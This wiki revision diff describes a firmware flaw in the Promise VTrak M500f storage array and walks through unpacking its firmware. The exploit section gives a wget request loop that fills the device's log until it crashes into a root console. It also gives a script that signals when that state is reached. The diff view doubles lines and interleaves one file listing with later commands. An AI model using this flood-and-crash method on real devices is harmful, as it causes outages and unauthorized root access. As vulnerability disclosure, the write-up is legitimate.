Promise VTrak M500f: Difference between revisions

From fakedWiki
Jump to: navigation, search
No edit summary
m (74 revisions imported)
 
(66 intermediate revisions by the same user not shown)
Line 1: Line 1:
=== Promise Technology VTrak M500f ===
{{TOCright|limit=2|width=500}}
== Exploit ==
I'm using a Promise VTrak M500f storage at work, and every couple of weeks it crashes. Updating to the latest firmware didn't help much.
 
It always starts with the device's webserver being unresponsive, and not much later the whole device just breaking down.
 
Usually, when i notice that the device starts to act up again, i just reboot it and it's fine for the next couple of weeks.
 
To do this, i log in on the serial console and run:
 
<pre>
administrator@cli> shutdown -a restart
</pre>
So the last time this happened, i noticed something is different with the CLI over serial console... it was... way more interesting!
 
 
 
=== Oh, exploitable! ===
Here's one of the problem sources: in line 23 and 24 of ''/islavista/sw/php/promise/language.php'', which is included in the code that's executed when you access the device's WebPAM PROe webinterface, PHP is told to get the language of the user's browser from a header that the browser sends on each request.
 
No problem there, your browser provides this header, so you probably won't ever see any error from this code.
 
But if you're using a monitoring tool like Nagios, to check if the webinterface is still alive, your Nagios check doesn't send that header and PHP will throw an error of the level E_NOTICE.
 
<pre>
$ php -a
Interactive mode enabled
 
<?php
preg_match('/^([a-z\-]+)/i', $_SERVER['HTTP_ACCEPT_LANGUAGE'], $matches);
    $lang=$matches[1];
    switch(substr($lang,0,2))
    {
      case 'en':
  $language='en_US';
        break;
      // [...]
      default:
        $language='en_US';
        break;
    }
?>
PHP Notice:  Undefined index: HTTP_ACCEPT_LANGUAGE in - on line 2
PHP Notice:  Undefined offset: 1 in - on line 3
</pre>
 
Of course, being the good developer that you are, you hide those errors, should they ever arise at all, from the user - and only write them to a logfile somewhere on your device's internal flash.
 
<pre>
[08-Jul-2011 19:52:24] PHP Notice:  Undefined index:  HTTP_ACCEPT_LANGUAGE in /islavista/sw/php/promise/language.php on line 23
[08-Jul-2011 19:52:24] PHP Notice:  Undefined offset:  1 in /islavista/sw/php/promise/language.php on line 24
[08-Jul-2011 19:52:26] PHP Notice:  Undefined index:  HTTP_HOST in /islavista/sw/php/promise/index.php on line 182
</pre>
 
Being a bit unsure yourself of how good of a developer you really are, you tell PHP in its config file ''/islavista/conf/sw/php.ini'' to not only log real errors of the levels E_WARNING or E_ERROR, or like the healthy default recommends, "E_ALL & ~E_NOTICE" (everything except E_NOTICE)... no, you want them all, so you can write impeccable code!
 
Have you ever wondered why it's called "default" setting? The De-Fault setting? Also known as the "Please don't break anything!" setting? You'll find out soon.
 
So, your Nagios checks the webserver every 5 minutes, every hour of the day, every day of the week, etc., and every time there are a couple of lines appended to the logfile, because you want to be in control an see each and any issue in you code.
 
Now what would you think will happen if that logfile gets so big that there is no space left on that flash?
 
I can tell you what will happen:
<pre>
islavista> _
</pre>
 
When i told Promise about the issue, one of their support engineers had only this to say:
<pre>
"I just can repeat [to] you one more time, you should not even know the word 'islavista' related to this device."
</pre>
 
Okay, that was a lie, it wasn't the only thing he said. He added:
<pre>
"You need a new controller."
</pre>
O RLY? I don't think that replacing '''my''' hardware will fix an issue in '''your''' firmware.
 
(Speaking of which, i'm still unsure if i should publish the whole conversation via their ticketing system, that will be pretty embarassing for them... they tried to convince me that my hardware is faulty and needs to be replaced. Yeah, right.)
 
 
 
=== Privilege Escalation ===
The 3 lines per request equal 354 Bytes of text, and my storage crashed when the logfile was roughly 3.5 MB in size, so in theory ~10.000 requests are all that's needed for this exploit to work its magic.
 
Nagios checks every 5 minutes, that's 288 requests per day, which means that after ~35 days the log should have filled all available space.
 
Can we speed this up? Yes, we can. A ''wget'' request to the webinterface takes me an average of 6 seconds, so with the following simple script i can get ~14400 requests per day, which means it takes ~17 hours fill all available space.
<pre>
$ while [ true ]; do wget -O /dev/null "http://192.168.0.2"; done
</pre>
Check the webinterface from time to time, when you see an PHP error that it couldn't write it's session because /tmp is full, you're golden! Fire up you serial console and enjoy.
 
You can automate this, too:
<pre>
$ while [ true ]; do if `lynx --dump "http://192.168.0.2/" | grep -q "tmp"`; then echo "EOF" | mail -s 'Exploit ready!' you@example.com; break; fi; done
</pre>
 
=== Remote Privilege Escalation, too? ===
Still unconfirmed, but in theory this should also work over Telnet instead of the serial console, provided that Telnet is enabled on the device.
 
 
 
 
== Firmware ==
 
 
=== Getting Started ===
 
Download the most recent firmware, at the time of this writing it was v2.39, and also make sure you have ''binwalk'' installed, an incredibly helpful tool when analyzing firmware files:
 
*Download Page: http://firstweb.promise.com/support/download/download2_eng.asp?productID=153&category=all&os=100
*Download Page: http://firstweb.promise.com/support/download/download2_eng.asp?productID=153&category=all&os=100
*Link to Firmware: http://firstweb.promise.com/upload/Support/Firmware/Mx00_series_v2.39.0000.00_with_notes.zip
*Firmware: http://firstweb.promise.com/upload/Support/Firmware/Mx00_series_v2.39.0000.00_with_notes.zip
*Link to binwalk: http://code.google.com/p/binwalk/
*binwalk: http://code.google.com/p/binwalk/
 
 


=== Analyzing the Firmware file ===
Use binwalk to look for the addresses of files within the firmware file:
<pre>
<pre>
binwalk -v iv2p_all_20110303_16mb.img
$ binwalk -v iv2p_all_20110303_16mb.img
</pre>
</pre>
This gives you a nice table with the decimal offset of each file in the firmware, and also the most likely format of this file:
<pre>
<pre>
Scan Time:    Aug 03, 2011 @ 20:13:21
Scan Time:    Aug 03, 2011 @ 20:13:21
Line 17: Line 133:
-------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------
18204          0x471C          gzip compressed data, from Unix, last modified: Thu Apr 20 05:12:30 2006, max compression
18204          0x471C          gzip compressed data, from Unix, last modified: Thu Apr 20 05:12:30 2006, max compression
871968          0xD4E20        Linux Compressed ROM filesystem data, little endian size 2584576 version #2 sorted_dirs           CRC 0xeeb623f0, edition 0, 1217 blocks,           7 files
871968          0xD4E20        Linux Compressed ROM filesystem data, little endian size 2584576 version #2 sorted_dirs, CRC 0xeeb623f0, edition 0, 1217 blocks, 7 files
3456544        0x34BE20        Linux Compressed ROM filesystem data, little endian size 3231744 version #2 sorted_dirs           CRC 0xf1e0771a, edition 0, 2870 blocks,           946 files
3456544        0x34BE20        Linux Compressed ROM filesystem data, little endian size 3231744 version #2 sorted_dirs, CRC 0xf1e0771a, edition 0, 2870 blocks, 946 files
3528967        0x35D907        bzip2 compressed data
3528967        0x35D907        bzip2 compressed data
6688288        0x660E20        gzip compressed data, from Unix, last modified: Thu Mar  3 03:51:40 2011, max compression
6688288        0x660E20        gzip compressed data, from Unix, last modified: Thu Mar  3 03:51:40 2011, max compression
11309493        0xAC91B5        Linux Compressed ROM filesystem data, little endian size 1277952 version #2 sorted_dirs           CRC 0x477edaab, edition 0, 802 blocks,           142 files
11309493        0xAC91B5        Linux Compressed ROM filesystem data, little endian size 1277952 version #2 sorted_dirs, CRC 0x477edaab, edition 0, 802 blocks, 142 files
12882033        0xC49071        LZMA compressed data, properties: 0x5D, dictionary size: 335544320 bytes, uncompressed size: 30 bytes
12882033        0xC49071        LZMA compressed data, properties: 0x5D, dictionary size: 335544320 bytes, uncompressed size: 30 bytes
13215338        0xC9A66A        LZMA compressed data, properties: 0x85, dictionary size: 740294656 bytes, uncompressed size: 16388 bytes
13215338        0xC9A66A        LZMA compressed data, properties: 0x85, dictionary size: 740294656 bytes, uncompressed size: 16388 bytes
Line 31: Line 147:
13221354        0xC9BDEA        LZMA compressed data, properties: 0x90, dictionary size: 65536 bytes, uncompressed size: 65536 bytes
13221354        0xC9BDEA        LZMA compressed data, properties: 0x90, dictionary size: 65536 bytes, uncompressed size: 65536 bytes
</pre>
</pre>
==== part 1 ====
 
=== Extracting the Firmware parts ===
 
The principle is pretty simple: use ''dd'' to read a segment from the firmware (if=), using a blocksize (bs=) of 1, starting (skip=) at the decimal offset of the file you want, with a length (count=) of "the next file's offset minus this file's offset" and write it to an ouput file (of=). It makes it a lot easier if you give the output file the extension of the filetype that binwalk tells you.
 
 
 
==== Part 1 ====
<pre>
<pre>
dd if=iv2p_all_20110303_16mb.img bs=1 skip=18204 count=853764 of=part1.gz
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=18204 count=853764 of=part1.gz
gunzip part1.gz
$ gunzip part1.gz
file part1
$ file part1
</pre>
</pre>
<pre>
<pre>
part1: data
part1: data
</pre>
</pre>
Probably the kernel and initrd?


==== part 2 ====
==== Part 2 ====
<pre>
<pre>
dd if=iv2p_all_20110303_16mb.img bs=1 skip=871968 count=2584576 of=part2.cramfs
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=871968 count=2584576 of=part2.cramfs
mkdir part2
$ mkdir part2
mount -o loop parts2.cramfs part2/
$ mount -o loop parts2.cramfs part2/
ls -l part2/
$ ls -l part2/
</pre>
</pre>
<pre>
<pre>
Line 57: Line 183:
-rw-r--r-- 1 root root  619697 Jan  1  1970 xfc.o
-rw-r--r-- 1 root root  619697 Jan  1  1970 xfc.o
</pre>
</pre>
Kernel modules, boooring!


==== part 3 ====
==== Part 3 ====
<pre>
<pre>
dd if=iv2p_all_20110303_16mb.img bs=1 skip=3456544 count=72423 of=part3.cramfs
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=3456544 count=72423 of=part3.cramfs
mount -o loop part3.cramfs part3/
$ mount -o loop part3.cramfs part3/
ls -lR part3/
$ ls -lR part3/
</pre>
</pre>
[[Promise VTrak M500f Firmware/part3|Full contents of Part 3]]
[[Promise VTrak M500f Firmware/part3|Full contents of Part 3]]
==== part 4 ====
 
The webinterface and some non-standard binaries, so this must be their own code.
 
When accessing a file you'll get an error, though. Quick check:
<pre>
$ fsck.cramfs part3.cramfs
</pre>
<pre>
fsck.cramfs: file length too short
</pre>
Damn.
 
 
 
==== Part 4 ====
<pre>
<pre>
dd if=iv2p_all_20110303_16mb.img bs=1 skip=3528967 count=3159321 of=part4.bz2
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=3528967 count=3159321 of=part4.bz2
bunzip2 part4.bz2
$ bunzip2 part4.bz2
</pre>
</pre>
<pre>
<pre>
bunzip2: part4.bz2 is not a bzip2 file.
bunzip2: part4.bz2 is not a bzip2 file.
</pre>
</pre>
Hmm, strange.


==== part 5 ====
==== Part 5 ====
<pre>
<pre>
dd if=iv2p_all_20110303_16mb.img bs=1 skip=6688288 count=4621205 of=part5.gz
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=6688288 count=4621205 of=part5.gz
gunzip part5.gz
$ gunzip part5.gz
file part5
$ file part5
</pre>
</pre>
<pre>
<pre>
part5: Linux rev 1.0 ext2 filesystem data, UUID=1e4f9d2b-b406-4a38-bbf8-8f1fcf52e5c7
part5: Linux rev 1.0 ext2 filesystem data, UUID=1e4f9d2b-b406-4a38-bbf8-8f1fcf52e5c7
</pre>
</pre>
So it's a gzip, but that contains an ext2 partition.
<pre>
<pre>
mv part5 part5.ext2
$ mv part5 part5.ext2
mkdir part5
$ mkdir part5
mount -o loop part5.ext2 part5/
$ mount -o loop part5.ext2 part5/
ls -lR part5/
$ ls -lR part5/
</pre>
</pre>
<pre>
[[Promise VTrak M500f Firmware/part5|Full contents of Part 5]]
part5/:
total 29
drwxr-xr-x 2 root root  1024 Mar  3 03:45 bin
drwxr-xr-x 2 root root  6144 Mar  3 03:37 dev
drwxr-xr-x 5 root root  1024 Mar  3 03:51 etc
drwxr-xr-x 6 root root  1024 Mar  3 03:51 islavista
drwxr-xr-x 3 root root  1024 Mar  3 03:51 lib
drwx------ 2 root root 12288 Mar  3 03:51 lost+found
drwxr-xr-x 2 root root  1024 Mar  3 03:37 mnt
drwxr-xr-x 2 root root  1024 Mar  3 03:37 oem
drwxr-xr-x 2 root root  1024 Mar  3 03:37 proc
drwxr-xr-x 2 root root  1024 Mar  3 03:45 sbin
drwxr-xr-x 2 root root  1024 Mar  3 03:37 tmp
drwxr-xr-x 8 root root  1024 Mar  3 03:37 usr
drwxr-xr-x 4 root root  1024 Mar  3 03:37 var


part5/bin:
BusyBox, libraries, you name it. This must be the base Linux part.
total 540
lrwxrwxrwx 1 root root    12 Mar  3 03:51 addgroup -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 adduser -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 ash -> /bin/busybox
-rwxr-xr-x 1 root root 548128 Mar  3 03:45 busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 cat -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 chgrp -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 chmod -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 chown -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 cp -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 date -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 dd -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 delgroup -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 deluser -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 df -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 dmesg -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 echo -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 false -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 fgrep -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 grep -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 gunzip -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 gzip -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 hostname -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 ip -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 kill -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 ln -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 login -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 ls -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 mkdir -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 mknod -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 more -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 mount -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 mv -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 netstat -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 pidof -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 ping -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 ps -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 pwd -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 rm -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 rmdir -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 sed -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 sh -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 sleep -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 stty -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 su -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 sync -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 tar -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 touch -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 true -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 umount -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 uname -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 uncompress -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 usleep -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 vi -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 zcat -> /bin/busybox


part5/dev:
==== Part 6 ====
total 0
<pre>
crwx------ 1 root root  5,  1 Mar  3 03:37 console
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=11309493 count=1572540 of=part6.cramfs
lrwxrwxrwx 1 root root      13 Mar  3 03:51 fd -> /proc/self/fd
$ mkdir part6/
crw-r--r-- 1 root root 129,  0 Mar  3 03:37 iogenerator
$ mount -o loop part6.cramfs part6/
crw-r--r-- 1 root root 127,  0 Mar  3 03:37 islavista
$ ls -lR part6/
crw-r--r-- 1 root root  1,  2 Mar  3 03:37 kmem
</pre>
brw-r--r-- 1 root root  7,  0 Mar  3 03:37 loop0
[[Promise VTrak M500f Firmware/part6|Full contents of Part 6]]
brw-r--r-- 1 root root  7,  1 Mar  3 03:37 loop1
brw-r--r-- 1 root root  7,  2 Mar  3 03:37 loop2
brw-r--r-- 1 root root  7,  3 Mar  3 03:37 loop3
brw-r--r-- 1 root root  7,  4 Mar  3 03:37 loop4
brw-r--r-- 1 root root  7,  5 Mar  3 03:37 loop5
brw-r--r-- 1 root root  7,  6 Mar  3 03:37 loop6
brw-r--r-- 1 root root  7,  7 Mar  3 03:37 loop7
crw-r--r-- 1 root root  1,  1 Mar  3 03:37 mem
crw-r--r-- 1 root root  90,  0 Mar  3 03:37 mtd0
crw-r--r-- 1 root root  90,  2 Mar  3 03:37 mtd1
crw-r--r-- 1 root root  90,  20 Mar  3 03:37 mtd10
crw-r--r-- 1 root root  90,  22 Mar  3 03:37 mtd11
crw-r--r-- 1 root root  90,  24 Mar  3 03:37 mtd12
crw-r--r-- 1 root root  90,  26 Mar  3 03:37 mtd13
crw-r--r-- 1 root root  90,  28 Mar  3 03:37 mtd14
crw-r--r-- 1 root root  90,  30 Mar  3 03:37 mtd15
crw-r--r-- 1 root root  90,  32 Mar  3 03:37 mtd16
crw-r--r-- 1 root root  90,  34 Mar  3 03:37 mtd17
crw-r--r-- 1 root root  90,  36 Mar  3 03:37 mtd18
crw-r--r-- 1 root root  90,  38 Mar  3 03:37 mtd19
crw-r--r-- 1 root root  90,  4 Mar  3 03:37 mtd2
crw-r--r-- 1 root root  90,  40 Mar  3 03:37 mtd20
crw-r--r-- 1 root root  90,  6 Mar  3 03:37 mtd3
crw-r--r-- 1 root root  90,  8 Mar  3 03:37 mtd4
crw-r--r-- 1 root root  90,  10 Mar  3 03:37 mtd5
crw-r--r-- 1 root root  90,  12 Mar  3 03:37 mtd6
crw-r--r-- 1 root root  90,  14 Mar  3 03:37 mtd7
crw-r--r-- 1 root root  90,  16 Mar  3 03:37 mtd8
crw-r--r-- 1 root root  90,  18 Mar  3 03:37 mtd9
brw-r--r-- 1 root root  31,  0 Mar  3 03:37 mtdblock0
brw-r--r-- 1 root root  31,  1 Mar  3 03:37 mtdblock1
brw-r--r-- 1 root root  31,  10 Mar  3 03:37 mtdblock10
brw-r--r-- 1 root root  31,  11 Mar  3 03:37 mtdblock11
brw-r--r-- 1 root root  31,  12 Mar  3 03:37 mtdblock12
brw-r--r-- 1 root root  31,  13 Mar  3 03:37 mtdblock13
brw-r--r-- 1 root root  31,  14 Mar  3 03:37 mtdblock14
brw-r--r-- 1 root root  31,  15 Mar  3 03:37 mtdblock15
brw-r--r-- 1 root root  31,  16 Mar  3 03:37 mtdblock16
brw-r--r-- 1 root root  31,  17 Mar  3 03:37 mtdblock17
brw-r--r-- 1 root root  31,  18 Mar  3 03:37 mtdblock18
brw-r--r-- 1 root root  31,  19 Mar  3 03:37 mtdblock19
brw-r--r-- 1 root root  31,  2 Mar  3 03:37 mtdblock2
brw-r--r-- 1 root root  31,  20 Mar  3 03:37 mtdblock20
brw-r--r-- 1 root root  31,  3 Mar  3 03:37 mtdblock3
brw-r--r-- 1 root root  31,  4 Mar  3 03:37 mtdblock4
brw-r--r-- 1 root root  31,  5 Mar  3 03:37 mtdblock5
brw-r--r-- 1 root root  31,  6 Mar  3 03:37 mtdblock6
brw-r--r-- 1 root root  31,  7 Mar  3 03:37 mtdblock7
brw-r--r-- 1 root root  31,  8 Mar  3 03:37 mtdblock8
brw-r--r-- 1 root root  31,  9 Mar  3 03:37 mtdblock9
crw-rw-rw- 1 root root  1,  3 Mar  3 03:37 null
crw-rw-rw- 1 root tty    2, 176 Mar  3 03:37 ptya0
crw-rw-rw- 1 root tty    2, 177 Mar  3 03:37 ptya1
crw-rw-rw- 1 root tty    2, 178 Mar  3 03:37 ptya2
crw-rw-rw- 1 root tty    2, 179 Mar  3 03:37 ptya3
crw-rw-rw- 1 root tty    2, 180 Mar  3 03:37 ptya4
crw-rw-rw- 1 root tty    2, 181 Mar  3 03:37 ptya5
crw-rw-rw- 1 root tty    2, 182 Mar  3 03:37 ptya6
crw-rw-rw- 1 root tty    2, 183 Mar  3 03:37 ptya7
crw-rw-rw- 1 root tty    2, 184 Mar  3 03:37 ptya8
crw-rw-rw- 1 root tty    2, 185 Mar  3 03:37 ptya9
crw-rw-rw- 1 root tty    2, 186 Mar  3 03:37 ptyaa
crw-rw-rw- 1 root tty    2, 187 Mar  3 03:37 ptyab
crw-rw-rw- 1 root tty    2, 188 Mar  3 03:37 ptyac
crw-rw-rw- 1 root tty    2, 189 Mar  3 03:37 ptyad
crw-rw-rw- 1 root tty    2, 190 Mar  3 03:37 ptyae
crw-rw-rw- 1 root tty    2, 191 Mar  3 03:37 ptyaf
crw-rw-rw- 1 root tty    2, 192 Mar  3 03:37 ptyb0
crw-rw-rw- 1 root tty    2, 193 Mar  3 03:37 ptyb1
crw-rw-rw- 1 root tty    2, 194 Mar  3 03:37 ptyb2
crw-rw-rw- 1 root tty    2, 195 Mar  3 03:37 ptyb3
crw-rw-rw- 1 root tty    2, 196 Mar  3 03:37 ptyb4
crw-rw-rw- 1 root tty    2, 197 Mar  3 03:37 ptyb5
crw-rw-rw- 1 root tty    2, 198 Mar  3 03:37 ptyb6
crw-rw-rw- 1 root tty    2, 199 Mar  3 03:37 ptyb7
crw-rw-rw- 1 root tty    2, 200 Mar  3 03:37 ptyb8
crw-rw-rw- 1 root tty    2, 201 Mar  3 03:37 ptyb9
crw-rw-rw- 1 root tty    2, 202 Mar  3 03:37 ptyba
crw-rw-rw- 1 root tty    2, 203 Mar  3 03:37 ptybb
crw-rw-rw- 1 root tty    2, 204 Mar  3 03:37 ptybc
crw-rw-rw- 1 root tty    2, 205 Mar  3 03:37 ptybd
crw-rw-rw- 1 root tty    2, 206 Mar  3 03:37 ptybe
crw-rw-rw- 1 root tty    2, 207 Mar  3 03:37 ptybf
crw-rw-rw- 1 root tty    2, 208 Mar  3 03:37 ptyc0
crw-rw-rw- 1 root tty    2, 209 Mar  3 03:37 ptyc1
crw-rw-rw- 1 root tty    2, 210 Mar  3 03:37 ptyc2
crw-rw-rw- 1 root tty    2, 211 Mar  3 03:37 ptyc3
crw-rw-rw- 1 root tty    2, 212 Mar  3 03:37 ptyc4
crw-rw-rw- 1 root tty    2, 213 Mar  3 03:37 ptyc5
crw-rw-rw- 1 root tty    2, 214 Mar  3 03:37 ptyc6
crw-rw-rw- 1 root tty    2, 215 Mar  3 03:37 ptyc7
crw-rw-rw- 1 root tty    2, 216 Mar  3 03:37 ptyc8
crw-rw-rw- 1 root tty    2, 217 Mar  3 03:37 ptyc9
crw-rw-rw- 1 root tty    2, 218 Mar  3 03:37 ptyca
crw-rw-rw- 1 root tty    2, 219 Mar  3 03:37 ptycb
crw-rw-rw- 1 root tty    2, 220 Mar  3 03:37 ptycc
crw-rw-rw- 1 root tty    2, 221 Mar  3 03:37 ptycd
crw-rw-rw- 1 root tty    2, 222 Mar  3 03:37 ptyce
crw-rw-rw- 1 root tty    2, 223 Mar  3 03:37 ptycf
crw-rw-rw- 1 root tty    2, 224 Mar  3 03:37 ptyd0
crw-rw-rw- 1 root tty    2, 225 Mar  3 03:37 ptyd1
crw-rw-rw- 1 root tty    2, 226 Mar  3 03:37 ptyd2
crw-rw-rw- 1 root tty    2, 227 Mar  3 03:37 ptyd3
crw-rw-rw- 1 root tty    2, 228 Mar  3 03:37 ptyd4
crw-rw-rw- 1 root tty    2, 229 Mar  3 03:37 ptyd5
crw-rw-rw- 1 root tty    2, 230 Mar  3 03:37 ptyd6
crw-rw-rw- 1 root tty    2, 231 Mar  3 03:37 ptyd7
crw-rw-rw- 1 root tty    2, 232 Mar  3 03:37 ptyd8
crw-rw-rw- 1 root tty    2, 233 Mar  3 03:37 ptyd9
crw-rw-rw- 1 root tty    2, 234 Mar  3 03:37 ptyda
crw-rw-rw- 1 root tty    2, 235 Mar  3 03:37 ptydb
crw-rw-rw- 1 root tty    2, 236 Mar  3 03:37 ptydc
crw-rw-rw- 1 root tty    2, 237 Mar  3 03:37 ptydd
crw-rw-rw- 1 root tty    2, 238 Mar  3 03:37 ptyde
crw-rw-rw- 1 root tty    2, 239 Mar  3 03:37 ptydf
crw-rw-rw- 1 root tty    2, 240 Mar  3 03:37 ptye0
crw-rw-rw- 1 root tty    2, 241 Mar  3 03:37 ptye1
crw-rw-rw- 1 root tty    2, 242 Mar  3 03:37 ptye2
crw-rw-rw- 1 root tty    2, 243 Mar  3 03:37 ptye3
crw-rw-rw- 1 root tty    2, 244 Mar  3 03:37 ptye4
crw-rw-rw- 1 root tty    2, 245 Mar  3 03:37 ptye5
crw-rw-rw- 1 root tty    2, 246 Mar  3 03:37 ptye6
crw-rw-rw- 1 root tty    2, 247 Mar  3 03:37 ptye7
crw-rw-rw- 1 root tty    2, 248 Mar  3 03:37 ptye8
crw-rw-rw- 1 root tty    2, 249 Mar  3 03:37 ptye9
crw-rw-rw- 1 root tty    2, 250 Mar  3 03:37 ptyea
crw-rw-rw- 1 root tty    2, 251 Mar  3 03:37 ptyeb
crw-rw-rw- 1 root tty    2, 252 Mar  3 03:37 ptyec
crw-rw-rw- 1 root tty    2, 253 Mar  3 03:37 ptyed
crw-rw-rw- 1 root tty    2, 254 Mar  3 03:37 ptyee
crw-rw-rw- 1 root tty    2, 255 Mar  3 03:37 ptyef
crw-rw-rw- 1 root tty    2,  0 Mar  3 03:37 ptyp0
crw-rw-rw- 1 root tty    2,  1 Mar  3 03:37 ptyp1
crw-rw-rw- 1 root tty    2,  2 Mar  3 03:37 ptyp2
crw-rw-rw- 1 root tty    2,  3 Mar  3 03:37 ptyp3
crw-rw-rw- 1 root tty    2,  4 Mar  3 03:37 ptyp4
crw-rw-rw- 1 root tty    2,  5 Mar  3 03:37 ptyp5
crw-rw-rw- 1 root tty    2,  6 Mar  3 03:37 ptyp6
crw-rw-rw- 1 root tty    2,  7 Mar  3 03:37 ptyp7
crw-rw-rw- 1 root tty    2,  8 Mar  3 03:37 ptyp8
crw-rw-rw- 1 root tty    2,  9 Mar  3 03:37 ptyp9
crw-rw-rw- 1 root tty    2,  10 Mar  3 03:37 ptypa
crw-rw-rw- 1 root tty    2,  11 Mar  3 03:37 ptypb
crw-rw-rw- 1 root tty    2,  12 Mar  3 03:37 ptypc
crw-rw-rw- 1 root tty    2,  13 Mar  3 03:37 ptypd
crw-rw-rw- 1 root tty    2,  14 Mar  3 03:37 ptype
crw-rw-rw- 1 root tty    2,  15 Mar  3 03:37 ptypf
crw-rw-rw- 1 root tty    2,  16 Mar  3 03:37 ptyq0
crw-rw-rw- 1 root tty    2,  17 Mar  3 03:37 ptyq1
crw-rw-rw- 1 root tty    2,  18 Mar  3 03:37 ptyq2
crw-rw-rw- 1 root tty    2,  19 Mar  3 03:37 ptyq3
crw-rw-rw- 1 root tty    2,  20 Mar  3 03:37 ptyq4
crw-rw-rw- 1 root tty    2,  21 Mar  3 03:37 ptyq5
crw-rw-rw- 1 root tty    2,  22 Mar  3 03:37 ptyq6
crw-rw-rw- 1 root tty    2,  23 Mar  3 03:37 ptyq7
crw-rw-rw- 1 root tty    2,  24 Mar  3 03:37 ptyq8
crw-rw-rw- 1 root tty    2,  25 Mar  3 03:37 ptyq9
crw-rw-rw- 1 root tty    2,  26 Mar  3 03:37 ptyqa
crw-rw-rw- 1 root tty    2,  27 Mar  3 03:37 ptyqb
crw-rw-rw- 1 root tty    2,  28 Mar  3 03:37 ptyqc
crw-rw-rw- 1 root tty    2,  29 Mar  3 03:37 ptyqd
crw-rw-rw- 1 root tty    2,  30 Mar  3 03:37 ptyqe
crw-rw-rw- 1 root tty    2,  31 Mar  3 03:37 ptyqf
crw-rw-rw- 1 root tty    2,  32 Mar  3 03:37 ptyr0
crw-rw-rw- 1 root tty    2,  33 Mar  3 03:37 ptyr1
crw-rw-rw- 1 root tty    2,  34 Mar  3 03:37 ptyr2
crw-rw-rw- 1 root tty    2,  35 Mar  3 03:37 ptyr3
crw-rw-rw- 1 root tty    2,  36 Mar  3 03:37 ptyr4
crw-rw-rw- 1 root tty    2,  37 Mar  3 03:37 ptyr5
crw-rw-rw- 1 root tty    2,  38 Mar  3 03:37 ptyr6
crw-rw-rw- 1 root tty    2,  39 Mar  3 03:37 ptyr7
crw-rw-rw- 1 root tty    2,  40 Mar  3 03:37 ptyr8
crw-rw-rw- 1 root tty    2,  41 Mar  3 03:37 ptyr9
crw-rw-rw- 1 root tty    2,  42 Mar  3 03:37 ptyra
crw-rw-rw- 1 root tty    2,  43 Mar  3 03:37 ptyrb
crw-rw-rw- 1 root tty    2,  44 Mar  3 03:37 ptyrc
crw-rw-rw- 1 root tty    2,  45 Mar  3 03:37 ptyrd
crw-rw-rw- 1 root tty    2,  46 Mar  3 03:37 ptyre
crw-rw-rw- 1 root tty    2,  47 Mar  3 03:37 ptyrf
